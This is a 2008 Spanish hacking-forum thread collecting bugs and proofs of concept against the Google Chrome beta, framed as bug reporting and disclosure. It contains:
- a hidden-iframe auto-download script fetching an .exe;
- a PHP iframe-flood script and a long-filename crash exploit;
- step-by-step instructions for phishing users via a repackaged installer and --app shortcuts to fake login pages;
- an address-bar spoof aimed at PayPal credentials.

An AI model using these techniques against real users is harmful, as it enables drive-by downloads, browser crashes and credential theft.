Foro de elhacker.net

Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: WHK en 3 Septiembre 2008, 00:45 am



Título: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 3 Septiembre 2008, 00:45 am
No se si soy yo que ando con la mala suerte pero me he encontrado con todos los contras de este nuevo explorador de google :(

acá dejo el mensaje que intenté dejar en el foro de discució de google chrome pero no pude.

Citar
1. "Debates > Sugerencias > Sugerencias y problemas d google chrome"
=> le falta una "de" :P

2. "Error 2 (net::ERR_FAILED): Error desconocido." => Eso sucede al
visitar un sitio con el protocolo FTP sin conexión, ahora cuando
ingreso "http://www.noexistolalalla%27%22%3E%3Ch1%3Ea.com/" dice
"Error 300 (net::ERR_INVALID_URL): Error desconocido.", claro, ahora
veo que la mayoría de los errores arrojados no son definidos por el
explorador pero si por la librería.

3. ¿Porque solo se lanzó para Windows y no para linux?

4. Me hace falta el botón "home" para no tener que posicionar el mouse
sobre la barradel explorador y escribir.

5. Podría haber alguna compatibilidad con addons de Firefox *.xpi para
utilizar mis complementos necesarios como noscript y cookiesedit?

6. al descargar un archivo me aparecen las opciones abajo pero no me
da la opción de "cancelar!!" y tampoco me da la opción de cancelar
todas... quepasaría si alguien me lanza una bomba de iframes hacia
archivos fakes descargables? me llenaría la bandeja de descargas sin
poder eliminarlas todas.

7. en los textboxs de los alerts de javascript podría dar la opción de
seleccionar el texto para poder copiar y pegar en caso de que se
necesite al igual que firefox en ubuntu.

------- EDITADO -------

Acabo de tener un encontrón con el explorador de google :/

Lo que hice fue pedir una url muy larga donde ovbiamente no existía y este me redireccionó hacia una pantala con el logo de google donde decía que la dirección dns no era válida, traté de ver el código fuente pero no me dejaba asi que con el botón derecho le di copiar dirección url de la imagen (logo de google) y pegué en otra pestaña y pude evr que este se localizaba en el sertvidor de google y no en mi localhost, antes de dar enter me apareció un error y se frizó causando una denegación de servicio y dandome la opción de reiniciar el explorador, no obstante me arrojó otra pantalla donde decía que no se podía cerrar la pestaña asi que me daba la opción de cerrar el explorador por completo desmintiendo el mito que decian en el video que si una pestaña fallaba entonces las demas quedaban intactas.
al reiniciar este me seguía arrojando errores y ya no puedo volver a iniciarlo con normalidad. Tube que entrar con firefox :/

AppName: chrome.exe    AppVer: 0.0.0.0    ModName: chrome.dll
ModVer: 0.2.149.27    Offset: 0005bda6

http://img148.imageshack.us/img148/6228/error003ww1.png
http://img148.imageshack.us/img148/4452/error002sp1.png

Y para rematar este foro me lanza un error y no puedo postear este tema ¬¬ tube que borrar el anterior y crearlo nuevamente.
http://img386.imageshack.us/img386/8642/error004zg8.png

Probaré desintalando :(

Las imagenes:
(http://img148.imageshack.us/img148/6228/error003ww1.png)

(http://img148.imageshack.us/img148/4452/error002sp1.png)

(http://img386.imageshack.us/img386/8642/error004zg8.png)

Estubo buena la idea de separar las ventanas por procesos pero el dr watson te mata el proceso padre asi que se terminan cerrando todas las pestañas por igual  :xD

Ahora que busco el contacto para reportar esto el sitio de google me manda a un error 404  :¬¬ y para reportar bugs debo iniciar el explorador que no quiere iniciar  :¬¬ que rabia, mejor me quedo con mi firefox, es mas estable y seguro pero no mas rápido  :P la estabilidad y seguridad no la transo por la rapidez, que se jodan los usuarios que les guste jugar mientras los mandan a chingar con DoS, yo prefiero ff.

Editado:

Cuando inicias por primera ves el chrome este te crea un archivo llamado "First Run" sin ningún contenido dentro y al reiniciarlo se iicia normal pero.. que pasa si borramos ese archivo? comienza a importar todo nuevamente y aparecen todas las vienvenidas. aunque es un poco molesto podrían haberlo hecho guardando los valores dentro del registro del sistema no?

Lo bueno de acá es que puedes editar tus mensajes si quieres añadir algo o responderte :p no como en los foros de gogle que con suerte te dejan enviar un mensaje por dia XD


Título: Re: Bug en google chrome
Publicado por: Darioxhcx en 3 Septiembre 2008, 00:53 am
cuek
recien salio hoy y el chabon ya estaba reportando fallos
=P
es un beta tmb
pero buee
saludos


Título: Re: Bug en google chrome
Publicado por: Eazy en 3 Septiembre 2008, 04:55 am
Por supuesto que es beta :P muchos geeks lo esperaban con la pc okm para pode buscar y buscar a maxima rapidez para ver los 3 primeros que reportaban -algo-


Título: Re: Bug en google chrome
Publicado por: berz3k en 3 Septiembre 2008, 16:34 pm
:http://evilfingers.com/advisory/google_chrome_poc.php

-berz3k.


Título: Re: Bug en google chrome
Publicado por: berz3k en 3 Septiembre 2008, 16:39 pm
Otro PoC en shortcuts de Win32

Have you installed the new Google chrome? Make sure you’re careful with your application shortcuts because I just thought of a very easy way to Phish basic users.

Código:

   1. Wrap the Chrome browser installation in your own InstallShield.
   2. Create a Phising Mirror of Gmail or what ever site you want to Phish.
   3. Add Desktop Shortcuts to the InstallShield which link to.
      "C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\Application\chrome.exe"  --app=http://login.live..yourfakehotmailwebsite.com
   4. Build your InstallShield.
   5. Stick a graphic on your website that says “Get Google Chrome Now” and link to your InstallShield build.


When the user install Google chrome from your link they'll get the browser but they will also find some helpful desktop links to their Hotmail/Gmail/Ebay account.

As the Apps mode in Chrome loads in full screen with NO URL BAR (What were they thinking?). The user will happily click on the desktop links thinking it's just a handy shortcut that their friends at Google installed, not knowing it's really a link to our phishing mirror of Gmail.

fuente
:http://www.thewayithink.co.uk/post/Security-Vulnerability-with-Google-Chrome.aspx



Título: Re: Bug en google chrome
Publicado por: WHK en 3 Septiembre 2008, 18:00 pm
Citar
Software:
Google Chrome Browser 0.2.149.27

Tested:
Windows XP Professional SP3

Result:
Google Chrome Crashes with All Tabs

El crash que a mi me resulta es sobre la plataforma de windows xp con sp2


Título: Re: Bug en google chrome
Publicado por: EvilGoblin en 3 Septiembre 2008, 19:08 pm
lo probe y me parecio inestable xDDDDDDDD

salio hoy? .. o.O
LOL!

^^ hagamos un exploit?
xD


Título: Re: Bug en google chrome
Publicado por: berz3k en 3 Septiembre 2008, 20:22 pm
Browser Automatic File Download

Exploit:

Código:
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>


Alguien mas? exploits diferentes a los posteados? hagamos una lista XD

fuente: securiteam.com

-berz3k.




Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 3 Septiembre 2008, 20:28 pm
PD: Cambie el nombre del topic inicial, para mejorar el tema.

-berz3k.



Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: it3r en 3 Septiembre 2008, 20:42 pm
eh ...que mal xD! pero bueeno solo es un beta habra que esperar la final

saludos


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: Eazy en 3 Septiembre 2008, 22:04 pm
La 'Etica' dice que no se sacan advisories ni poc de programas beta.


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 3 Septiembre 2008, 23:13 pm
Y mi ética dice que mientras mas fallas puedas reportar es mejor para el desarrollador ya que esto ayuda a fortalecer el mismo software asi como se ha hecho con firefox desde un comienzo.

Lo mejor que pudieron haber hecho es liberar su código , no tan solo para desarrollar sino para sanar bugs que podrían comprometer la integridad de todos sus usuarios finales por mas que sea beta o no.


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 4 Septiembre 2008, 00:35 am
Lo mas entretenido es que en el soporte de google nadie habla ingles XD
http://code.google.com/p/chromium/issues/detail?id=213

me dicen: "los técnicos solo hablan inglés" y nadie sabe que hablo  :xD entonces supongo que el software fue hecho solamente para los de habla inglesa jod(http://)er!

hay que explicarles con dibujos y manzanas...
(http://img77.imageshack.us/img77/7306/dibujokg4.png)

Bueno, sin ir mas ayá solo me molesta que no hablen español pero en cuanto al explorador en si espero que quede bién muy pronto como para salir de la etapa beta y poder utilizarlo con toda normalidad.

Código
  1. <?php
  2. echo "Iniciando prueba del concepto por WHK probando una
  3.          inundaci&oacute;n de mensajes en la bandeja de avisos sin la
  4.          posibilidad de eliminar completamente la barra perdiendo
  5.          links y aumentando el uso de recursos desmedidos.<br>\n";
  6. for($Cuenta=0;$Cuenta<900;$Cuenta++){
  7.  echo '<iframe src="file:///C:/WINDOWS/NOTEPAD.EXE" width="0" height="0" frameborder="0"></iframe>'."\n";
  8. }
  9. ?>

Además tiene la misma falla que firefox cuando modificas la barra del explorador y cuando haces click en el espacio de trabajo sin dar enter no buelve a su estado original... por ejemplo entra a https://evil.domain/getdata.php y después ve a tu web preparada para alojar los datos de la victima https://www.paypal.com/ sin dar enter y haciendo click en cualquier parte del formulario, si dejas el explorador en ese estado cualquier persona que intente acceder a su cuenta la estará regalando (IE7 no es vulnerable pero si ayer encontré una falla donde ingresas carácteres nulos en javascript: y la url se mantiene intacta de igual forma).


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 4 Septiembre 2008, 08:11 am
Código
  1. vbscript:alert("XSS");
El explorador no interpreta visual basic scripts.

Código
  1. mms://web.com/radio/
No soporta videos online con windows media video

Código
  1. <?php
  2. echo "Prueba del concepto para probar la vulnerabilidad de Google Chrome
  3. al no reestablecer su barra de navegaci&oacute;n al ser modificada sin ser
  4. establecido como url final.<br>
  5. \$_SERVER[HTTP_HOST] = <b>$_SERVER[HTTP_HOST]</b>"
  6. ?>
http://www.jccharry.com/pruebas/Google%20Chrome/1.php

Lo visualizas y después escribes arriba "https://www.paypal.com" y son presionar enter posicionas el mouse sobre el navegador.
Un atacante podría utilizarlo para robar cuentas remotamente, inclusive desde un ciber... dejas la página inicial de msn con un fake que capture contraseñas.

(http://img293.imageshack.us/img293/6961/error006ck2.png)

Esta falla podría ser aprobechado para un phishing facilmente.

Nota: Internet Explorer no presenta ese bug.


Citar
chrome-resource://new-tab/%%
En esta URL el explorador queda cargando infinitamente.

Citar
chrome-resource://thumb/fake
Acá el contenido no es declarado como imagen (Falta la cabezera del header!)

(http://img171.imageshack.us/img171/7997/error007jr3.png)

Como se imprime en texto plano, que pasaría si una imagen contiene cntenido HTML?, talves ahora no se sepa como pero con "chrome-resource" talves pueda apuntar a un archivo descargado automáticamente en formato imagen y cargarlo de la misma forma para su ejecución.
PD: Google le hace publicidad a "Adobe ImageReady"  :o


Claro...
(http://img240.imageshack.us/img240/8919/error008fx0.png)

Ovbiamente es rápido porque trabaja con multiprocesos pero eso significa utilizar casi la mitad de tus recursos queriendo decir "o navegas o usas photoshop porque acá no podrás caminar y masticar chicle al mismo tiempo"


Citar
chrome-resource://inspector
Ejalee!!!!
Citar
Esta página web tiene un bucle de redireccionamiento.

La página web de chrome-resource://inspector////////////////////// ha provocado demasiados redireccionamientos. Es posible que se solucione el problema si borras las cookies. Si no es así, tal vez se deba a una configuración del servidor y no a un problema con tu equipo.

A continuación se detallan algunas sugerencias:
Carga esta página web de nuevo más tarde.
  Más información sobre este error
Como decia antes, talves puedas tener acceso a la carga de archivos externos al sistema.


No se si alguien me está tirando alguna maldición  :¬¬ pero el explorer no me deja visualizar lo que hay dentro de
Citar
C:\Documents and Settings\Yan\Configuración local\Datos de programa\Google\Chrome\Application\0.2.149.27\Resources\Inspector\Images

(http://imgcash2.imageshack.us/Himg214/scaled.php?server=214&filename=error009ol0.png&xsize=500&ysize=500) (http://img214.imageshack.us/img214/3007/error009ol0.png)


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: hkm en 4 Septiembre 2008, 08:41 am
La funcion de acceso directo a aplicaciones aparte de no mostrar en que servidor estas, tampoco muestra el estado del SSL. Esta es una invitacion a portales falsos.

Un atacante (phisher) podria abusar de usuarios novatos que por ingenieria social abran un archivo malicioso (.bat o .lnk) que contenga una linea similar a:
Código:
%homepath%\AppData\Local\Google\Chrome\Application\chrome.exe --app=http://www.malicioso.net/pagina-bancaria-falsa.html


hkm


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: sirdarckcat en 4 Septiembre 2008, 16:14 pm
La 'Etica' dice que no se sacan advisories ni poc de programas beta.
Al contrario, se sacan para que los arreglen antes de que sea una versión estable :¬¬.. lo que sí es "mas" ético es no publicar las cosas hasta que las arreglen, pero no siempre se puede.

WHK, me hubieras dicho y te ayudaba con la traducción :xD.

Saludos!!

PD. Un gusto verlo por aqui hakim


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: APOKLIPTICO en 4 Septiembre 2008, 18:49 pm
Ey! probablemente estes en la pista de un zero day... XD
Este google chrome esta demasiado beta como para que lo use nadie...
Un abrazo
APOKLIPTICO


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 4 Septiembre 2008, 23:12 pm
Citar
Este google chrome esta demasiado beta como para que lo use nadie...
Creeme que si google lanza un ejecutable y lo expone en su página principal lo mas seguro es que miles de personas lo ejecuten sin saber de que se trate. Tampoco creo que todos sus visitantes tengan alguna noción sobre el estado de aquel proyecto por lo cual solo se limitan a bajarlo y usarlo y ven que está rápido entonces lo siguen usando.


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 5 Septiembre 2008, 00:58 am
encontré un bug un poco mas elegante  :P se trata de que cuando vizualizas una web este se cierra sin decirle nada  a nadie y sin dar avisos de error ni nada, simplemente se cierra y ya.

http://www.jccharry.com/pruebas/Google%20Chrome/2.php

 :xD Como vi que este descargaba todo sin pedir confirmación pensé en dar algún tipo de archivo que no pudiese ser guardado como un "con" o un archivo con mas de 255 caracteres y ahi va el exploit:

Código
  1. <?php
  2.  
  3. /*
  4. Google Chrome 0.2.149.27 (1583) Silent Crash PoC
  5. WHK - elhacker.net
  6. */
  7.  
  8. $nombre = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.psd';
  9. $contenido = 'prueba';
  10. header("Content-Type: application/octet-stream");
  11. header("Content-Disposition: attachment; filename=$nombre");
  12. print($contenido);
  13.  
  14. /*
  15. http://www.jccharry.com/pruebas/Google%20Chrome/2.php
  16. http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_bugsexploits_en_google_chrome_win32-t226450.0.html
  17. http://milw0rm.com/exploits/6365
  18. */
  19.  
  20. ?>
No se porqué pero al pegar la URL directamente en la barra de navegación no pasa nada pero cuando ingresas navegando entonces ahi si se cae con pestañas y todo.
http://www.jccharry.com/pruebas/Google%20Chrome/
Hagan click en 2.php

[editado]No cargaba al pegar la url por la codificación en urlencode"%20" pero el exploit funciona bién.[/editado]

Esto no ha sido publicado en ningún otro lugar  :-*


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 5 Septiembre 2008, 03:00 am

@WHK

En efecto, al pegar directamente en Chrome no pasa nada, pero el code funciona perfectamente, muy curioso..

-berz3k.



Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: Micah Genji en 5 Septiembre 2008, 05:11 am
Vaya solo pense dar una vuelta por el foro para ver que opinaban sobre el nuevo explorador y a la vez lo rapido que se pudo encontrar bugs, si siguen asi en una semana quien sabe cuantos bugs vayan :)


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: Littlehorse en 5 Septiembre 2008, 05:38 am
A mi la verdad que no me entra todavia en la cabeza como pudieron encontrar un bug como este  :-X :-\

Código:
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

Es increible que a Google se le haya pasado algo asi. Esa mania de sacar betas/alpha sin ningun minimo testeo.



pd: Un detallito, cualquier navegador iria igual de limado que el chrome si por pestaña consumiese 20mb como me lo esta haciendo en este mismo momento :P


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 5 Septiembre 2008, 05:47 am
Citar
pd: Un detallito, cualquier navegador iria igual de limado que el chrome si por pestaña consumiese 20mb como me lo esta haciendo en este mismo momento :P

Mi firefox anda casi igual o mas rápido porque lo manejo en prioridad alta desde el administrador de tareas mientras hago mis trabajos y eso que todavía no se instalan plugines dentro del explorador de google porque ahi si va a pesar y va a tomar mas lentitud ya que si separa cada pestaña en un proceso diferente eso significa que debe iniciar el proceso de un plugin por cada pestaña adicional.

URL:
Citar
about:

Contenido:
Citar
Google Chrome
0.2.149.27 (1583)
Build oficial
Google Inc.
Copyright © 2006-2008 Google Inc. Todos los derechos reservados.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13

El explorador se basa en el motor de Safri y no es propio como un amigo me habia comentado.


El bug encontrado anteriormente ya fue expuesto en milw0rm con este link:
http://milw0rm.com/exploits/6365



Citar
javascript:Alert("test");
Citar
javascript:alert("test");
